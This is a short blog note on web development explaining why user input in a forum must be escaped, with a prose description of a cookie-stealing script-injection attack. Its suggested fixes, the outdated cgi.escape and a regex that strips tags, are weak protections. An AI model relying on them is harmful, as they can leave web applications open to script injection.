Flangy > Software Development > Web Note: You can't trust user input
Consider if you will a page containing a textarea and a submit button. The user can enter whatever text and press the button. The text is saved in a database and displayed on a separate page for all to see. As an example, any web based discussion forum you please.
You can't just echo the user's input to a page. Why not? Well, the user might put HTML tags in their text. Let's assume no malicious intent whatsoever, there's always the possibility of a missing </b> tag, causing the rest of the page to show up bold.
Assuming malicious intent, the user could insert a script block that pops open a new window to a different server, with the current user's cookies attached to the URL. Looking at the logs for that other server you can get cookie information. If the discussion board doesn't have good security measures it might be possible to use someone else's cookies and post under their name.
Since there are far too many bored 12 year olds out there, you always have to assume the worst, that there will be malicious intent, and that it will happen immediately. We call people who go around doing this "Internet Terrorists", but only because I can't think of a more condescending name for them. I suppose "script kiddies" works too, but then I'd have to go around explaining what that meant to people at work.
So at the very least, you have to strip out HTML tags, or change angle brackets to entities so the HTML shows as source code, or otherwise defuse potential HTML in user input.
(Note, using HTML tags in an input form to goof up the display of a page is known as "Tag Injection", or "Script Injection" if it specifically includes script.)
Luckily most languages commonly used for Web programming have a function to strip or encode HTML entities. In Python you can use cgi.escape(text) to encode entities or re.sub(r"(<[^>]*>)", '', text) to strip out tags.